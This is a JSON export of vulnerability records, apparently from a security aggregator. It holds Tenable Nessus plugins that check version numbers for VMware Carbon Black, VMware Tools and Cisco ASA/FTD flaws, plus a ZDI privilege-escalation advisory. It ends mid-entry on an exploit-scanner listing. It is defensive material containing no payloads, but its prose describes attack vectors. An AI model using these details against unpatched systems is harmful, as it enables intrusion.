vulnerability exists in the VMware Carbon Black App Control management server. 
An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary actions with administrative privileges.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-23T00:00:00", "type": "nessus", "title": "VMware Carbon Black App Control 8.0.x / 8.1.x / 8.5.x < 8.5.8 / 8.6.x < 8.6.2 Authentication Bypass (VMSA-2021-0012)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21998"], "modified": "2022-07-19T00:00:00", "cpe": ["cpe:/a:vmware:carbon_black_app_control"], "id": "VMWARE_CB_APP_CONTROL_VMSA-2021-0012.NASL", "href": "https://www.tenable.com/plugins/nessus/152047", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152047);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/07/19\");\n\n script_cve_id(\"CVE-2021-21998\");\n 
script_xref(name:\"IAVA\", value:\"2021-A-0295-S\");\n script_xref(name:\"VMSA\", value:\"2021-0012\");\n\n script_name(english:\"VMware Carbon Black App Control 8.0.x / 8.1.x / 8.5.x < 8.5.8 / 8.6.x < 8.6.2 Authentication Bypass (VMSA-2021-0012)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by an authentication bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"An authentication bypass vulnerability exists in the VMware Carbon Black App Control management server. An \nunauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary actions with \nadministrative privileges.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2021-0012.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware Carbon Black App Control 8.5.8, 8.6.2, or later, or apply the relevant hotfix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21998\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:carbon_black_app_control\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"vmware_carbon_black_app_control_win_installed.nbin\", \"vmware_carbon_black_app_control_web_console_detect.nbin\");\n script_require_keys(\"installed_sw/VMware Carbon Black App Control\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_name = 'VMware Carbon Black App Control';\n\n# logic confirm the asset is windows \nvar local_os = get_kb_item('Host/OS');\nvar reg_enum = get_kb_item('SMB/Registry/Enumerated');\nif ((!empty_or_null(local_os) && 'windows' >!< tolower(local_os)) && !reg_enum )\n audit(AUDIT_OS_NOT, 'Windows');\n\nvar app_info = vcf::combined_get_app_info(app:app_name);\n\nif (app_info.version =~ \"^8\\.[10]\\.\" && report_paranoia < 2) \n audit(AUDIT_POTENTIAL_VULN, 'VMware Carbon Black App Control', app_info.version);\n\nvar constraints = [\n { 'min_version' : '8.0', 'fixed_version' : '8.2', 'fixed_display' : 'See vendor advisory for Hotfix' },\n { 'min_version' : '8.5.0.0', 'fixed_version' : '8.5.8.4' },\n { 'min_version' : '8.6.0.0', 'fixed_version' : '8.6.2.26' }\n];\n\nif (app_info.version =~ \"^8\\.[10]\\.\" && report_paranoia < 2) \n audit(AUDIT_POTENTIAL_VULN, 'VMware Carbon Black App Control', app_info.version);\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:52:08", "description": "The version of VMware Tools installed on the remote Windows host is 11.x prior to 11.2.6. It is, therefore, affected by a local privilege escalation vulnerability. 
An attacker with normal access to a virtual machine may exploit this issue by placing a malicious file renamed as 'openssl.cnf' in an unrestricted directory which would allow code to be executed with elevated privileges.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-02T00:00:00", "type": "nessus", "title": "VMware Tools 11.x < 11.2.6 Privilege Escalation (VMSA-2021-0013)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21999"], "modified": "2022-05-30T00:00:00", "cpe": ["cpe:/a:vmware:tools"], "id": "VMWARE_TOOLS_WIN_VMSA_2021_0013.NASL", "href": "https://www.tenable.com/plugins/nessus/151285", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151285);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/30\");\n\n script_cve_id(\"CVE-2021-21999\");\n 
script_xref(name:\"VMSA\", value:\"VMSA-2021-0013\");\n script_xref(name:\"IAVB\", value:\"2021-B-0037-S\");\n\n script_name(english:\"VMware Tools 11.x < 11.2.6 Privilege Escalation (VMSA-2021-0013)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization tool suite installed on the remote Windows host is affected by a privilege escalation vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Tools installed on the remote Windows host is 11.x prior to 11.2.6. It is, therefore, affected by\na local privilege escalation vulnerability. An attacker with normal access to a virtual machine may exploit this issue\nby placing a malicious file renamed as 'openssl.cnf' in an unrestricted directory which would allow code to be executed\nwith elevated privileges.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2021-0013.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware Tools version 11.2.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21999\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:tools\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_tools_installed.nbin\", \"vmware_vsphere_detect.nbin\", \"vmware_esxi_detection.nbin\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/VMware Tools\", \"Host/ESXi/checked\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\nvar app_info = vcf::get_app_info(app:'VMware Tools', win_local:TRUE);\n\nvar constraints = [\n { 'min_version' : '11.0', 'fixed_version' : '11.2.6' }\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n );\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-09T15:22:34", "description": "The version of Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software running on the remote web server is affected by a cross-site scripting vulnerability. 
An unauthenticated, remote attacker can exploit this, by convincing a user to click a specially crafted URL, to execute arbitrary script code in a user's browser session.\nPlease see the included Cisco BID and Cisco Security Advisory for more information.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-07-07T00:00:00", "type": "nessus", "title": "Cisco ASA Software and FTD Software Web Services Interface XSS (cisco-sa-asaftd-xss-multiple-FCB3vPZe) (Direct Check)", "bulletinFamily": "scanner", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580"], "modified": "2023-03-08T00:00:00", "cpe": ["cpe:/o:cisco:firepower_threat_defense", "cpe:/a:cisco:adaptive_security_appliance_software"], "id": "CISCO_ASA_CVE-2020-3580.NBIN", "href": "https://www.tenable.com/plugins/nessus/151442", "sourceData": "Binary data cisco_asa_cve-2020-3580.nbin", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T14:50:50", "description": "According to its self-reported version, Cisco Firepower Threat Defense Software is affected by multiple vulnerabilities.\nPlease see the included Cisco BIDs and Cisco Security 
Advisory for more information.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-06-24T00:00:00", "type": "nessus", "title": "Cisco Firepower Threat Defense Software Web Services Interface Multiple Vulnerabilities (cisco-sa-asaftd-xss-multiple-FCB3vPZe)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580", "CVE-2020-3581", "CVE-2020-3582", "CVE-2020-3583"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:cisco:firepower_threat_defense"], "id": "CISCO-SA-ASAFTD-XSS-MULTIPLE-FCB3VPZE.NASL", "href": "https://www.tenable.com/plugins/nessus/150997", "sourceData": "#TRUSTED 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\n#TRUST-RSA-SHA256 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\n#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150997);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-3580\",\n \"CVE-2020-3581\",\n \"CVE-2020-3582\",\n \"CVE-2020-3583\"\n );\n 
script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvu44910\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvu75581\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvu83309\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvv13835\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvw53796\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-asaftd-xss-multiple-FCB3vPZe\");\n script_xref(name:\"IAVA\", value:\"2020-A-0488\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0031\");\n\n script_name(english:\"Cisco Firepower Threat Defense Software Web Services Interface Multiple Vulnerabilities (cisco-sa-asaftd-xss-multiple-FCB3vPZe)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch (cisco-sa-asaftd-xss-multiple-FCB3vPZe)\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, Cisco Firepower Threat Defense Software is affected by multiple vulnerabilities.\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4f256d96\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvu44910\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvu75581\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvu83309\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvv13835\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvw53796\");\n script_set_attribute(attribute:\"solution\", 
value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug IDs CSCvu44910, CSCvu75581, CSCvu83309, CSCvv13835, CSCvw53796\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3583\");\n script_set_attribute(attribute:\"cvss_score_rationale\", value:\"Based on vendor advisory\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(79);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:firepower_threat_defense\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_enumerate_firepower.nbin\");\n script_require_keys(\"installed_sw/Cisco Firepower Threat Defense\");\n\n exit(0);\n}\n\ninclude('ccf.inc');\n\nvar product_info, version_list, reporting, workarounds;\n\nproduct_info = cisco::get_product_info(name:'Cisco Firepower Threat Defense');\n\nvuln_ranges = [\n {'min_ver' : '0.0.0', 'fix_ver': '6.4.0.12'},\n {'min_ver' : '6.5.0', 'fix_ver': '6.6.4'},\n {'min_ver' : '6.7.0', 'fix_ver': '6.7.0.2'}\n];\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_WARNING,\n 'version' , product_info['version'],\n 'bug_id' , 'CSCvu44910, CSCvu75581, CSCvu83309, CSCvv13835, CSCvw53796',\n 'xss' , TRUE \n);\n\nworkarounds = make_list(CISCO_WORKAROUNDS['IKEv2_enabled'],CISCO_WORKAROUNDS['ssl_vpn'] );\n\ncisco::check_and_report(\n product_info:product_info,\n reporting:reporting,\n workarounds:workarounds,\n vuln_ranges:vuln_ranges\n);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T14:50:50", "description": "According to its self-reported version, Cisco ASA Software is affected by multiple vulnerabilities.\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-06-24T00:00:00", "type": "nessus", "title": "Cisco Adaptive Security Appliance Software Multiple Vulnerabilities (cisco-sa-asaftd-xss-multiple-FCB3vPZe)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580", "CVE-2020-3581", "CVE-2020-3582", "CVE-2020-3583"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:cisco:adaptive_security_appliance_software"], "id": "CISCO-SA-ASA-XSS-MULTIPLE-FCB3VPZE.NASL", "href": "https://www.tenable.com/plugins/nessus/150996", "sourceData": "#TRUSTED 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\n#TRUST-RSA-SHA256 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\n#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150996);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-3580\",\n \"CVE-2020-3581\",\n \"CVE-2020-3582\",\n \"CVE-2020-3583\"\n );\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvu44910\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvu75581\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvu83309\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvv13835\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvw53796\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-asaftd-xss-multiple-FCB3vPZe\");\n script_xref(name:\"IAVA\", value:\"2020-A-0488\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0031\");\n\n script_name(english:\"Cisco Adaptive Security Appliance Software Multiple Vulnerabilities (cisco-sa-asaftd-xss-multiple-FCB3vPZe)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a 
vendor-supplied security patch (cisco-sa-asaftd-xss-multiple-FCB3vPZe)\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, Cisco ASA Software is affected by multiple vulnerabilities.\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4f256d96\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvu44910\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvu75581\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvu83309\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvv13835\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvw53796\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug IDs CSCvu44910, CSCvu75581, CSCvu83309, CSCvv13835, CSCvw53796\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3583\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(79);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/21\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2020/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:adaptive_security_appliance_software\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Cisco/ASA\");\n\n exit(0);\n}\n\ninclude('ccf.inc');\ninclude('cisco_workarounds.inc');\n\nvar product_info, vuln_ranges, workarounds, reporting;\n\nproduct_info = cisco::get_product_info(name:'Cisco Adaptive Security Appliance (ASA) Software');\n\nvuln_ranges = [\n {'min_ver' : '0.0.0', 'fix_ver': '9.8.4.34'},\n {'min_ver' : '9.9.0', 'fix_ver': '9.9.2.85'},\n {'min_ver' : '9.10.0', 'max_ver': '9.10.9999', 'fix_ver': '9.12.4.13'},\n {'min_ver' : '9.12.0', 'fix_ver': '9.12.4.13'},\n {'min_ver' : '9.13.0', 'fix_ver': '9.13.1.21'},\n {'min_ver' : '9.14.0', 'fix_ver': '9.14.2.8'},\n {'min_ver' : '9.15.0', 'fix_ver': '9.15.1.15'}\n ];\n\nworkarounds = make_list(CISCO_WORKAROUNDS['IKEv2_enabled'],CISCO_WORKAROUNDS['ssl_vpn'] );\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_WARNING,\n 'version' , product_info['version'],\n 'bug_id' , 'CSCvu44910, CSCvu75581, CSCvu83309, CSCvv13835, CSCvw53796',\n 'xss' , TRUE\n);\n\ncisco::check_and_report(\n product_info:product_info,\n reporting:reporting,\n workarounds:workarounds,\n vuln_ranges:vuln_ranges\n);\n ", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "zdi": [{"lastseen": "2022-01-31T22:20:50", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of VMware Workstation. 
An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the VGAuthService service. The issue results from the lack of proper validation of a user-supplied OpenSSL configuration file prior to using it. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-23T00:00:00", "type": "zdi", "title": "VMware Workstation Tools Uncontrolled Search Path Element Local Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21999"], "modified": "2021-06-23T00:00:00", "id": "ZDI-21-754", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-754/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-08-13T16:54:28", "description": "<h1 align=\"center\">\n <br>\n CVE-2020-3580 Automated Scanner \n</h...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": 
